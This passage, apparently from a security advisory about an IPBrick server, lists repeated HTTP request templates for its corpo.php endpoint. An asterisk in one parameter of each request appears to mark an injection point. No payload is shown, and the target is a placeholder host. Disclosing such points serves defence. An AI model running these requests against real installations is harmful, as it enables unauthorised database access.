name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0avoip_placas_pstn_submitdb\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;tipoplaca\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;manufacturer\&quot;\x0d\x0a\x0d\x0a6\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;numportas\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;interface1\&quot;\x0d\x0a\x0d\x0aPSTN*\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;porta1\&quot;\x0d\x0a\x0d\x0aTE PtP\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;inserir\&quot;\x0d\x0a\x0d\x0aInsert\x0d\x0a-----------------------------1263099156734327261671054908--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
pagina=gre_alt_acc*&amp;amp;idgre=2&amp;amp;reload=1&amp;amp;control=2&amp;amp;lastrmt=0&amp;amp;name=a&amp;amp;description=b&amp;amp;active=t&amp;amp;lo_ip1=10&amp;amp;lo_ip2=0&amp;amp;lo_ip3=0&amp;amp;lo_ip4=253&amp;amp;li_ip1=192&amp;amp;li_ip2=168&amp;amp;li_ip3=69&amp;amp;li_ip4=199&amp;amp;ro_ip1=1&amp;amp;ro_ip2=1&amp;amp;ro_ip3=1&amp;amp;ro_ip4=12&amp;amp;alterar=Modify
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET
https://ipbrick.domain.com/corpo.php?pagina=utilizador_ver_lista&amp;amp;offset=0&amp;amp;first_char=&amp;amp;pesq_nome=*
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0avoip_placas_pstn_submitdb\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;tipoplaca\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;manufacturer\&quot;\x0d\x0a\x0d\x0a6\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;numportas\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;interface1\&quot;\x0d\x0a\x0d\x0aPSTN\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;porta1\&quot;\x0d\x0a\x0d\x0aTE PtP*\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\&quot;inserir\&quot;\x0d\x0a\x0d\x0aInsert\x0d\x0a-----------------------------1263099156734327261671054908--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
